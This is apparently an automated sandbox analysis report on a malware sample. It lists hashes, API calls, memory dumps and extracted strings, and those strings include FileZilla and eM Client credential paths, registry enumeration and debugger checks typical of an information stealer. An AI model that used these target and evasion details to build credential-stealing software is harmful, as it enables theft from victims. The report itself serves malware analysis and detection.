                                                            • Opcode ID: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
                                                            • Instruction ID: b54a30de40d39881521df567edad888a5efcf5dcf9e065f2953d68bc5b8e4da5
                                                            • Opcode Fuzzy Hash: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
                                                            • Instruction Fuzzy Hash: 3AE0E5212001A56AFA30A767CC01B6B3A4DFF417B8F010037ED47A62D1DBACEC0285AE
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00A3942E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3920154401.0000000000A38000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A38000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a38000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction ID: cb7e5c4f15d26838bb936c52f2eaaefbe730e57e41cec8c839bb981c64a13bf7
                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction Fuzzy Hash: 7D113C79A00208EFDB01DF98CA85E99BBF5AF08350F058094F9489B362D371EA50DF80
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$Y[[T$bi${#9${#9$Y=`$Y=`
                                                            • API String ID: 1659193697-3907602706
                                                            • Opcode ID: b550c6edbfc739eb8f81f84309a248c2000b550dd3d445275482cde3558858bf
                                                            • Instruction ID: 6cd6494ebd1ae3ef0f4c84d98eff8e9ba892bbcaf3f46cdc065c550b622333ee
                                                            • Opcode Fuzzy Hash: b550c6edbfc739eb8f81f84309a248c2000b550dd3d445275482cde3558858bf
                                                            • Instruction Fuzzy Hash: ABF21BB1D0261A8BDF24CB5CDE856BD7BB4AB55311F240926E509FB390E37C8E409B93
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "w$ "w$EeS$EeS$EeS$JI3i$KI3i$KI3i$VL6T$VL6T$_m.Q$_m.Q$eo>w$fo>w$fo>w$mNA/
                                                            • API String ID: 0-3469262258
                                                            • Opcode ID: e6d9c21a7490ec2a00f5106aa89416e629d5b74fe5aeb65d2d60d2ef2e2dda1a
                                                            • Instruction ID: d97e6ef89693257e208e89547e5d4b8279768d6e4159cb61fbaa3f7825fd39aa
                                                            • Opcode Fuzzy Hash: e6d9c21a7490ec2a00f5106aa89416e629d5b74fe5aeb65d2d60d2ef2e2dda1a
                                                            • Instruction Fuzzy Hash: 9B03F874D0410A8BCF28DB9CCAA56FDB6B5EB45324F70092BE555EB350D378CE418B92
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 009C11AC
                                                            • RtlAllocateHeap.NTDLL(?,00000008,00000028), ref: 009C1752
                                                            • GetDIBits.GDI32(?,00000001,00000000,?,?,00000001,00000000), ref: 009C2461
                                                            • ReleaseDC.USER32(00000000,?), ref: 009C246B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap$BitsRelease
                                                            • String ID: $jRk$?$TT4$TT4$q7 C$q7 C$y_B>$y_B>
                                                            • API String ID: 2392854675-2600574631
                                                            • Opcode ID: 0fe5284bdf45d83cd6d71459b9714451c746a96b2f378b9609cc4e18fca22abc
                                                            • Instruction ID: 987224fb3f01a51f0cbb2c4289a6fe995e2aae0e624cbbfdd826b6ded1c82c15
                                                            • Opcode Fuzzy Hash: 0fe5284bdf45d83cd6d71459b9714451c746a96b2f378b9609cc4e18fca22abc
                                                            • Instruction Fuzzy Hash: 47C2D475D0011ACBCF28DB98CA81BBDBAB8AF55340F24452FE545EB291D7358E80CB97
                                                            APIs
                                                            • wsprintfW.USER32 ref: 009C4942
                                                            • RegEnumKeyExW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 009C498C
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?,00000001), ref: 009C500C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnumOpenwsprintf
                                                            • String ID: $jRk$$jRk$?$TT4$TT4$y_B>$y_B>
                                                            • API String ID: 934838074-1833258458
                                                            • Opcode ID: 3b54bece40eef002e0db5d64569429b679c5c83022a00990b2c8552d4bb31e81
                                                            • Instruction ID: 33ee80ab6abd3f7c18bb8c0331416a014b1bc884771d3fb6a8e1ce24b24e8c2b
                                                            • Opcode Fuzzy Hash: 3b54bece40eef002e0db5d64569429b679c5c83022a00990b2c8552d4bb31e81
                                                            • Instruction Fuzzy Hash: 65621BB1E0425A8BDF24CB588965FBDB6B5AB50310F254A2EE415EB390D374DE80CBD3
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: A@6e$A@6e$RY30$^^4$^^4$ame=$ilen
                                                            • API String ID: 4218353326-3679160039
                                                            • Opcode ID: 6343018893d56b40ec195c5c117dfc83d0fc6755fe54ce157062feabbfcac08c
                                                            • Instruction ID: 89a7ea4ffc1e1c1345c7edeab8cf0c126ba802b8a8bac672787cbcb216adf790
                                                            • Opcode Fuzzy Hash: 6343018893d56b40ec195c5c117dfc83d0fc6755fe54ce157062feabbfcac08c
                                                            • Instruction Fuzzy Hash: FE72C8B1D4021A8BDF24CF98C89657DBBF4AF1A700F240926E515FB7A2D334DA408BD6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !t8$"t8$"t8$(lu$)lu$)lu$Ied|$Ied|$Pz#$Pz#$n_v$n_v$u2B$v2B$v2B
                                                            • API String ID: 0-3549259986
                                                            • Opcode ID: a0ad07c5876174a456e6ff089356687033de193354f657ccdd22f267db1287ce
                                                            • Instruction ID: 0a25495e4ef18ad5dc081dbbfaf9c21051d29c4ac10542d32bd939d995a0bc97
                                                            • Opcode Fuzzy Hash: a0ad07c5876174a456e6ff089356687033de193354f657ccdd22f267db1287ce
                                                            • Instruction Fuzzy Hash: 99E2FBB1E0021ADBDF24CB9CC89767EBA74AB55310F24096BF506FB390D7759A40CB92
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strncpy
                                                            • String ID: $jRk$$jRk$TT4$TT4$mE$x_B>$y_B>$y_B>
                                                            • API String ID: 2961919466-2403683918
                                                            • Opcode ID: 0fce3017fde26660b2fe1cd63b9b85230b5f86defa1d6f60f2e91c8398972e3b
                                                            • Instruction ID: f52cec9030e599997eca561383101da92912efcd4e35636ea4b20e87f313868f
                                                            • Opcode Fuzzy Hash: 0fce3017fde26660b2fe1cd63b9b85230b5f86defa1d6f60f2e91c8398972e3b
                                                            • Instruction Fuzzy Hash: 098207B1D0061A8BDF28CA98D855FBDBAB4AB15310F25492FD425EB351D334EAC0DB93
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $jRk$%appdata%\FileZilla$?$@an($Aan($Aan($Applications/FileZilla$ST4$TT4$TT4$q7 C$y_B>
                                                            • API String ID: 0-929912511
                                                            • Opcode ID: 4552184fbc30df57263dc870eb522a2c39f9d48f269a1af2991607538b6dd594
                                                            • Instruction ID: 1de1472d85231943203b2a108093d7b1c25ce76823a24e53af08ce0cf1ca813d
                                                            • Opcode Fuzzy Hash: 4552184fbc30df57263dc870eb522a2c39f9d48f269a1af2991607538b6dd594
                                                            • Instruction Fuzzy Hash: 29C20AB1D0521A9BDF249BAC8F526FE79B9AB50320F24093BF405FA291F775C9408793
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 9a%^$9a%^$9a%^$9a%^$L%$M%$M%$winhttp.dll
                                                            • API String ID: 0-1735461236
                                                            • Opcode ID: 76b40e2ef52341f5e2d246a304b554142d018d114a99d409a3a1d5b8bf5c742d
                                                            • Instruction ID: 55c358492240f1a66b939bdbfb384ac92f6793c7f89dc5f1804e8894cd70a71b
                                                            • Opcode Fuzzy Hash: 76b40e2ef52341f5e2d246a304b554142d018d114a99d409a3a1d5b8bf5c742d
                                                            • Instruction Fuzzy Hash: 71523BF1F0520A4BDF288B98C9956BE76A89B57304F24052BF916FE2A1D724CE40C7D7
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: &$($:[
                                                            • API String ID: 4218353326-884455141
                                                            • Opcode ID: 3034d82a480cb8f89dcfb5f74ad732d6c5b154c1f034d4a1a20f2f670bf56c56
                                                            • Instruction ID: 49ee894ca4f6137de510909cdc9c2e2db1e31f0e3824b62a5aaa56946a66b896
                                                            • Opcode Fuzzy Hash: 3034d82a480cb8f89dcfb5f74ad732d6c5b154c1f034d4a1a20f2f670bf56c56
                                                            • Instruction Fuzzy Hash: E012A2B09046068FDF18CF58D49066EBBF4FB5A310F24492AE495EB7A1D7788941CBD3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $jRk$$jRk$ST4$TT4$q7 C$q7 C$y_B>
                                                            • API String ID: 0-4120928008
                                                            • Opcode ID: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
                                                            • Instruction ID: 5c22b42f57fd4c8b5d073a15306ac116cd8962dfe2ba00638ce3b5f7952d8d8d
                                                            • Opcode Fuzzy Hash: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
                                                            • Instruction Fuzzy Hash: 6E929770518301DBD7349F28CA956BEBBE9AB99720F248D1EF185CB690DA74C841DB43
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(fltl), ref: 009B6645
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: A8r$dll$fltl$ib.d
                                                            • API String ID: 1029625771-252788044
                                                            • Opcode ID: 2039658f1a3f0192b30e54c42d1fc0f10245b4772019d9c249726f779701915c
                                                            • Instruction ID: 21384c875f8be83c37cba906ddd7524333bf9560a843ea8ee2d7234124af783e
                                                            • Opcode Fuzzy Hash: 2039658f1a3f0192b30e54c42d1fc0f10245b4772019d9c249726f779701915c
                                                            • Instruction Fuzzy Hash: A8E1AEB19093019BCA249F58CB857ADBBE5EB90720F248D2EF1D5CB254D27CE990DB43
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: EeS$EeS$UL6T$VL6T$VL6T
                                                            • API String ID: 0-1377693644
                                                            • Opcode ID: 822facb60093e5c78bbde4163aef7a75eac0453c728f865f1413c4f3083f18a3
                                                            • Instruction ID: c98ebbca8795bfb33c509870b351aa3a13752b480cb00e553ed75779ee9ceeed
                                                            • Opcode Fuzzy Hash: 822facb60093e5c78bbde4163aef7a75eac0453c728f865f1413c4f3083f18a3
                                                            • Instruction Fuzzy Hash: 71E21CF2D001055BEF189B9C8C86B7FB968EB52300F24092EFD45E6291FA35DE4497A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ?$ST4$TT4$x_B>$y_B>$y_B>
                                                            • API String ID: 0-2374627004
                                                            • Opcode ID: 02d0fd0443d9d51e028c47f058a80f2cd0009247c9e0929960f9bfe9abe723b5
                                                            • Instruction ID: 671d9cb03dfa5829e80e06773144e061e536b7233938cf0458616fe146b3aad2
                                                            • Opcode Fuzzy Hash: 02d0fd0443d9d51e028c47f058a80f2cd0009247c9e0929960f9bfe9abe723b5
                                                            • Instruction Fuzzy Hash: 9852F0B1D0420A8BDF38DB98CB516FDB674EB54330F644927E026EA2A0E779CD418797
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcessSleep
                                                            • String ID: Ku^%$Ku^%
                                                            • API String ID: 911557368-1067927601
                                                            • Opcode ID: f6021972401f7c41a5fb1171240c79893f85c95f9c191756a518817ecc8198a1
                                                            • Instruction ID: 58ca1e459a5003af8b7a2b84880c6c18be1e3dc0aa4a7b31928f90450810a642
                                                            • Opcode Fuzzy Hash: f6021972401f7c41a5fb1171240c79893f85c95f9c191756a518817ecc8198a1
                                                            • Instruction Fuzzy Hash: FCA1F8B1504B05ABCF348F1DD58162AB7E8AB457107748D1FE4ABCBA60E738F8549B12
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ku^%$Ku^%$Ku^%$Ku^%$Ku^%
                                                            • API String ID: 0-3469696018
                                                            • Opcode ID: 6ec76950be12901a45a75c5ce88806d55f504ea767741fb8e6c205ae61d7ac73
                                                            • Instruction ID: 2c06ec021a12575b0b314bc2f9268eef187751fb2de1c010867d68a5f80893a4
                                                            • Opcode Fuzzy Hash: 6ec76950be12901a45a75c5ce88806d55f504ea767741fb8e6c205ae61d7ac73
                                                            • Instruction Fuzzy Hash: F5B1E771D1015ACBDF28CB588D55BBE7A74EBC2310F24093BE916EB261E778CA408797
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,00469144,?,0099BA31,0099CC5B,?,?,?), ref: 0099AEC5
                                                            • lstrcatW.KERNEL32(?,0045FD78,?,?,?,?,?,?,?,?,00469144,?,0099BA31,0099CC5B,?,?), ref: 0099AF29
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 1475610065-0
                                                            • Opcode ID: ef72a88249dd871b6e6f7590a3c2d473460619251f7bcc7e3a36d31713e60fb7
                                                            • Instruction ID: b70c565eeea53c9a98b6049982adb0752afb7497b7625cf08df4dd504c48da33
                                                            • Opcode Fuzzy Hash: ef72a88249dd871b6e6f7590a3c2d473460619251f7bcc7e3a36d31713e60fb7
                                                            • Instruction Fuzzy Hash: F80248B1D042198BEF288B9CD9927BDB679EB14310F24492BE415FB290E37C8D419BD7
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strrchr
                                                            • String ID:
                                                            • API String ID: 3213747228-0
                                                            • Opcode ID: 12bee11bf7391676ae73bf0f68abedb6b2fa3ae6387d4d45c0890e18c1b165f5
                                                            • Instruction ID: 1dcf1ba126dca30ec7834518088d36c722ef152008ff2afa1e218aca451c4b0c
                                                            • Opcode Fuzzy Hash: 12bee11bf7391676ae73bf0f68abedb6b2fa3ae6387d4d45c0890e18c1b165f5
                                                            • Instruction Fuzzy Hash: B6B136329402859FDB158F68C8A2BFEBBA9EF55314F15C17BE806AB741D235DD01CBA0
                                                            APIs
                                                            • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009E22BE
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 009E2339
                                                            • FindClose.KERNEL32(00000000), ref: 009E235B
                                                            • FindClose.KERNEL32(00000000), ref: 009E237E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$CloseFile$FirstNext
                                                            • String ID:
                                                            • API String ID: 1164774033-0
                                                            • Opcode ID: 98469444129287ec3a0223e4e6863df554afa6925fe0b01ec864058e1a2505ac
                                                            • Instruction ID: a2c0ed1eff04fe34eaa7f731a02755008121960dd788def7885e8b5cadc74dc2
                                                            • Opcode Fuzzy Hash: 98469444129287ec3a0223e4e6863df554afa6925fe0b01ec864058e1a2505ac
                                                            • Instruction Fuzzy Hash: 1C41E671900259AFDF25DF66CC88ABAB37CEB84704F1441A5E505D7184F7749E84CF64
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 009CD108
                                                            • IsDebuggerPresent.KERNEL32 ref: 009CD1D4
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009CD1F4
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 009CD1FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
                                                            • Instruction ID: 4a8c1651fd8a05c2e4598a36bde8d2e56ca1f4b7e18f1639c06b3c409e5c768a
                                                            • Opcode Fuzzy Hash: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
                                                            • Instruction Fuzzy Hash: D2312B75D4521CDBDF20DF64D989BCCBBB8AF08704F1040AAE40DA7250EBB19A85CF56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ku^%$Ku^%$Y=`$Y=`
                                                            • API String ID: 0-3617128223
                                                            • Opcode ID: 5f34cb384d69458e94695c2cbe6bafde1a605cae2f8802c300460b8e96db7d5c
                                                            • Instruction ID: b5b7fc2472f0b33c2111c31968284abe19ddf223343a017bce1123e386c62962
                                                            • Opcode Fuzzy Hash: 5f34cb384d69458e94695c2cbe6bafde1a605cae2f8802c300460b8e96db7d5c
                                                            • Instruction Fuzzy Hash: 19F11971D4420A8BDF248FDDCC826BDBBB8AB55310F244927E411EA2B1E779DD44DB82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Mail Clients\eM Client$]^4$^^4$^^4
                                                            • API String ID: 0-1928883120
                                                            • Opcode ID: 2b4910dd263b016b495e14fa66466277187321ac52993c0523f68307dfe2152f
                                                            • Instruction ID: bb976ab1d0c67bd61af35d99c486630a19ed678bf02bd6fd39b430589c1a9397
                                                            • Opcode Fuzzy Hash: 2b4910dd263b016b495e14fa66466277187321ac52993c0523f68307dfe2152f
                                                            • Instruction Fuzzy Hash: 51E12BB1D0214A8FDF288B988F866FE76B8AF55330F244926E115F7250F779CA418793
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: QueryVirtual
                                                            • String ID: ]^4$^^4$^^4$^^4
                                                            • API String ID: 1804819252-2923853987
                                                            • Opcode ID: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                            • Instruction ID: 4b41455d5449960f3bea2cc3c5730be40b50ad48341d155cd6de400158660b6c
                                                            • Opcode Fuzzy Hash: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                            • Instruction Fuzzy Hash: 36510871A083528BDB288B1C9A846EE62D4DB85774F654D3BF479FB260C22CCD45AB43
                                                            APIs
                                                            • lstrcmpiW.KERNEL32(0045FAC2,0045FAC2,?,?,?,?,?,?,?,?,?,?,?,?,?,-000017AA), ref: 009CBA0C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcmpi
                                                            • String ID: VL6T$VL6T
                                                            • API String ID: 1586166983-2204272895
                                                            • Opcode ID: b34f7b6829543c5bcafa32b40e3420d98b0dff8f829e495a6d6cd6807b993e14
                                                            • Instruction ID: 69d85efe2572af6da2ac763926324d4a0261c0ea1aa52836f50a7f3ed80de37c
                                                            • Opcode Fuzzy Hash: b34f7b6829543c5bcafa32b40e3420d98b0dff8f829e495a6d6cd6807b993e14
                                                            • Instruction Fuzzy Hash: 49129571D041598BDF28CA9CC897BBEB6B4BB54740F24092EE516EB3A0D379CD409B93
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00995EEC), ref: 009DE69A
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00995EEC), ref: 009DE6A4
                                                            • UnhandledExceptionFilter.KERNEL32(0045F807,?,?,?,?,?,00995EEC), ref: 009DE6B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: fddfd219bb87237c86172eb2c7764efb5dcc82193680edb944fc16078175a50e
                                                            • Instruction ID: 547b035dfeb0924c96842007e75b33ee4bac77e185966763e8032ca30beabea2
                                                            • Opcode Fuzzy Hash: fddfd219bb87237c86172eb2c7764efb5dcc82193680edb944fc16078175a50e
                                                            • Instruction Fuzzy Hash: 1531B57490121C9BCB21DF24D889BDDBBB8BF58310F5041EAE41CA72A1EB709F858F45
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: UL6T$VL6T$VL6T
                                                            • API String ID: 0-1166735070
                                                            • Opcode ID: 9bed48560ca3b384b9a9f564c2ae7e0eec34a31771338bf98d0d52593d9e9e81
                                                            • Instruction ID: ee3516650340fe2f3a66b6cf4855ec0b23c2ea453e963096a8dedac448ce4d75
                                                            • Opcode Fuzzy Hash: 9bed48560ca3b384b9a9f564c2ae7e0eec34a31771338bf98d0d52593d9e9e81
                                                            • Instruction Fuzzy Hash: CB42EBB1D00119CBDF28CF988995BBE76B4BB95310F240A1FE555FB3A1E3348A508797
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: =`f\
                                                            • API String ID: 4218353326-984147390
                                                            • Opcode ID: c84d8bab664dab9cd0f48d91de88ba0d679f2a9024c898dd52fba93cb0488266
                                                            • Instruction ID: ef19b034ec3c2e88a08ca4b24b9e72489aec4f2e9793f0612ca9cffdd10e7d89
                                                            • Opcode Fuzzy Hash: c84d8bab664dab9cd0f48d91de88ba0d679f2a9024c898dd52fba93cb0488266
                                                            • Instruction Fuzzy Hash: 73823171608301AFDB14CF58C881B6BBBE5FF89344F04892DF999872A1D735E954CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,$n_v$n_v
